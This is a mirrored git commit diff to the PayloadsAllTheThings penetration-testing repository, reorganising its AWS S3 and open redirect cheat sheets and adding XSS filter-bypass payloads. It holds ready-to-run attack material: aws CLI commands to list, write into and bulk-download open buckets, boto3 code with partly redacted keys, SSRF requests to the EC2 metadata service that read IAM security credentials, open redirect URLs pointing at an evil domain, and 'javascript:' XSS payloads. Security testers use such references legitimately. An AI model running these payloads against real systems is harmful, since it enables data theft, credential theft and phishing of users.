mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
AWS S3 and Open redirect rewritten
This commit is contained in:
parent
67c644a300
commit
8b39647de6
@ -1,9 +1,47 @@
|
||||
# Amazon Bucket S3 AWS
|
||||
|
||||
## Summary
|
||||
|
||||
- [Tools](#tools)
|
||||
- [AWS Configuration](#aws-configuration)
|
||||
- [Open Bucket](#open-bucket)
|
||||
- [Basic tests](#basic-tests)
|
||||
- [Listing files](#listing-files)
|
||||
- [Move a file into the bucket](move-a-file-into-the-bucket)
|
||||
- [Download every things](#download-every-things)
|
||||
- [Check bucket disk size](#check-bucket-disk-size)
|
||||
- [AWS - Extract Backup](#aws---extract-backup)
|
||||
- [Bucket juicy data](#bucket-juicy-data)
|
||||
|
||||
## Tools
|
||||
|
||||
- [Pacu - The AWS exploitation framework, designed for testing the security of Amazon Web Services environments](https://github.com/RhinoSecurityLabs/pacu)
|
||||
- [Bucket Finder - Search for readable buckets and list all the files in them](https://digi.ninja/)
|
||||
```powershell
|
||||
wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2
|
||||
./bucket_finder.rb my_words
|
||||
./bucket_finder.rb --region ie my_words
|
||||
US Standard = http://s3.amazonaws.com
|
||||
Ireland = http://s3-eu-west-1.amazonaws.com
|
||||
Northern California = http://s3-us-west-1.amazonaws.com
|
||||
Singapore = http://s3-ap-southeast-1.amazonaws.com
|
||||
Tokyo = http://s3-ap-northeast-1.amazonaws.com
|
||||
|
||||
./bucket_finder.rb --download --region ie my_words
|
||||
./bucket_finder.rb --log-file bucket.out my_words
|
||||
```
|
||||
- [Boto3 - Amazon Web Services (AWS) SDK for Python](https://boto3.amazonaws.com/v1/documentation/api/latest/index.html)
|
||||
```python
|
||||
import boto3
|
||||
# Create an S3 client
|
||||
s3 = boto3.client('s3',aws_access_key_id='AKIAJQDP3RKREDACTED',aws_secret_access_key='igH8yFmmpMbnkcUaCqXJIRIozKVaREDACTED',region_name='us-west-1')
|
||||
|
||||
try:
|
||||
result = s3.list_buckets()
|
||||
print(result)
|
||||
except Exception as e:
|
||||
print(e
|
||||
```
|
||||
|
||||
## AWS Configuration
|
||||
|
||||
@ -61,7 +99,9 @@ http://example.com/resources/id%C0
|
||||
eg: http://redacted/avatar/123%C0
|
||||
```
|
||||
|
||||
## Basic test - Listing the files
|
||||
## Basic tests
|
||||
|
||||
### Listing files
|
||||
|
||||
```bash
|
||||
aws s3 ls s3://targetbucket --no-sign-request --region insert-region-here
|
||||
@ -80,7 +120,7 @@ Non-authoritative answer:
|
||||
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.
|
||||
```
|
||||
|
||||
## Move a file into the bucket
|
||||
### Move a file into the bucket
|
||||
|
||||
```bash
|
||||
aws s3 cp local.txt s3://some-bucket/remote.txt --acl authenticated-read
|
||||
@ -95,13 +135,15 @@ aws s3 mv test.txt s3://hackerone.files
|
||||
SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"
|
||||
```
|
||||
|
||||
## Download every things (in an open bucket)
|
||||
### Download every things
|
||||
|
||||
```powershell
|
||||
aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2
|
||||
```
|
||||
|
||||
## Check bucket disk size (authenticated) use, --no-sign for un-authenticated
|
||||
### Check bucket disk size
|
||||
|
||||
Use `--no-sign` for un-authenticated check.
|
||||
|
||||
```powershell
|
||||
aws s3 ls s3://<bucketname> --recursive | grep -v -E "(Bucket: |Prefix: |LastWriteTime|^$|--)" | awk 'BEGIN {total=0}{total+=$3}END{print total/1024/1024" MB"}'
|
||||
@ -128,7 +170,7 @@ sudo file -s /dev/xvda1
|
||||
sudo mount /dev/xvda1 /mnt
|
||||
```
|
||||
|
||||
## Bucket informations
|
||||
## Bucket juicy data
|
||||
|
||||
Amazon exposes an internal service every EC2 instance can query for instance metadata about the host. If you found an SSRF vulnerability that runs on EC2, try requesting :
|
||||
|
||||
@ -141,35 +183,12 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
|
||||
|
||||
For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
|
||||
|
||||
## Bucket Finder
|
||||
|
||||
A cool tool that will search for readable buckets and list all the files in them. It can also be used to quickly find buckets that exist but deny access to listing files.
|
||||
|
||||
```powershell
|
||||
wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2
|
||||
./bucket_finder.rb my_words
|
||||
./bucket_finder.rb --region ie my_words
|
||||
US Standard = http://s3.amazonaws.com
|
||||
Ireland = http://s3-eu-west-1.amazonaws.com
|
||||
Northern California = http://s3-us-west-1.amazonaws.com
|
||||
Singapore = http://s3-ap-southeast-1.amazonaws.com
|
||||
Tokyo = http://s3-ap-northeast-1.amazonaws.com
|
||||
|
||||
./bucket_finder.rb --download --region ie my_words
|
||||
./bucket_finder.rb --log-file bucket.out my_words
|
||||
```
|
||||
|
||||
Use a custom wordlist for the bucket finder, can be created with
|
||||
|
||||
```powershell
|
||||
List of Fortune1000 company names with permutations on .com, -backup, -media. For example, walmart becomes walmart, walmart.com, walmart-backup, walmart-media.
|
||||
List of the top Alexa 100,000 sites with permutations on the TLD and www. For example, walmart.com becomes www.walmart.com, www.walmart.net, walmart.com, and walmart.
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
* https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets
|
||||
* https://digi.ninja/projects/bucket_finder.php
|
||||
* [There's a Hole in 1,951 Amazon S3 Buckets - Mar 27, 2013 - Rapid7 willis](https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets)
|
||||
* [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792)
|
||||
* [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/)
|
||||
* [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud)
|
||||
* [Guardzilla video camera hardcoded AWS credential - 0dayallday.org](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/)
|
||||
|
@ -2,6 +2,43 @@
|
||||
|
||||
> Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts may have a more trustworthy appearance. Unvalidated redirect and forward attacks can also be used to maliciously craft a URL that would pass the application’s access control check and then forward the attacker to privileged functions that they would normally not be able to access.
|
||||
|
||||
## Summary
|
||||
|
||||
- [Exploitation](#exploitation)
|
||||
- [HTTP Redirection Status Code - 3xx](#http-redirection-status-code---3xx)
|
||||
- [Fuzzing](#fuzzing)
|
||||
- [Filter Bypass](#filter-bypass)
|
||||
- [Common injection parameters](#common-injection-parameters)
|
||||
- [References](#references)
|
||||
|
||||
## Exploitation
|
||||
|
||||
Let’s say there’s a `well known` website - https://famous-website.tld/. And let's assume that there's a link like :
|
||||
|
||||
```powershell
|
||||
https://famous-website.tld/signup?redirectUrl=https://famous-website.tld/account
|
||||
```
|
||||
After signing up you get redirected to your account, this redirection is specified by the `redirectUrl` parameter in the URL.
|
||||
What happens if we change the `famous-website.tld/account` to `evil-website.tld`?
|
||||
|
||||
```powerhshell
|
||||
https://famous-website.tld/signup?redirectUrl=https://evil-website.tld/account
|
||||
```
|
||||
|
||||
By visiting this url, if we get redirected to `evil-website.tld` after the signup, we have an Open Redirect vulnerability. This can be abused by an attacker to display a phishing page asking you to enter your credentials.
|
||||
|
||||
|
||||
## HTTP Redirection Status Code - 3xx
|
||||
|
||||
- [300 Multiple Choices](https://httpstatuses.com/300)
|
||||
- [301 Moved Permanently](https://httpstatuses.com/301)
|
||||
- [302 Found](https://httpstatuses.com/302)
|
||||
- [303 See Other](https://httpstatuses.com/303)
|
||||
- [304 Not Modified](https://httpstatuses.com/304)
|
||||
- [305 Use Proxy](https://httpstatuses.com/305)
|
||||
- [307 Temporary Redirect](https://httpstatuses.com/307)
|
||||
- [308 Permanent Redirect](https://httpstatuses.com/308)
|
||||
|
||||
## Fuzzing
|
||||
|
||||
Replace www.whitelisteddomain.tld from *Open-Redirect-payloads.txt* with a specific white listed domain in your test case
|
||||
@ -12,7 +49,7 @@ To do this simply modify the WHITELISTEDDOMAIN with value www.test.com to your t
|
||||
WHITELISTEDDOMAIN="www.test.com" && sed 's/www.whitelisteddomain.tld/'"$WHITELISTEDDOMAIN"'/' Open-Redirect-payloads.txt > Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt && echo "$WHITELISTEDDOMAIN" | awk -F. '{print "https://"$0"."$NF}' >> Open-Redirect-payloads-burp-"$WHITELISTEDDOMAIN".txt
|
||||
```
|
||||
|
||||
## Exploitation
|
||||
## Filter Bypass
|
||||
|
||||
Using a whitelisted domain or keyword
|
||||
|
||||
@ -131,3 +168,4 @@ http://www.example.com/redirect.php?url=javascript:prompt(1)
|
||||
* [OWASP - Unvalidated Redirects and Forwards Cheat Sheet](https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet)
|
||||
* [Cujanovic - Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
|
||||
* [Pentester Land - Open Redirect Cheat Sheet](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
|
||||
* [Open Redirect Vulnerability - AUGUST 15, 2018 - s0cket7](https://s0cket7.com/open-redirect-vulnerability/)
|
@ -564,6 +564,14 @@ content['alert'](6)
|
||||
[12].forEach(alert);
|
||||
```
|
||||
|
||||
Bypass using an alternate way to execute an alert - [@quanyang](https://twitter.com/quanyang/status/1078536601184030721)
|
||||
```javascript
|
||||
prompt`${document.domain}`
|
||||
document.location='java\tscript:alert(1)'
|
||||
document.location='java\rscript:alert(1)'
|
||||
document.location='java\tscript:alert(1)'
|
||||
```
|
||||
|
||||
Bypass using an alternate way to execute an alert - [@404death](https://twitter.com/404death/status/1011860096685502464)
|
||||
|
||||
```javascript
|
||||
|
Loading…
Reference in New Issue
Block a user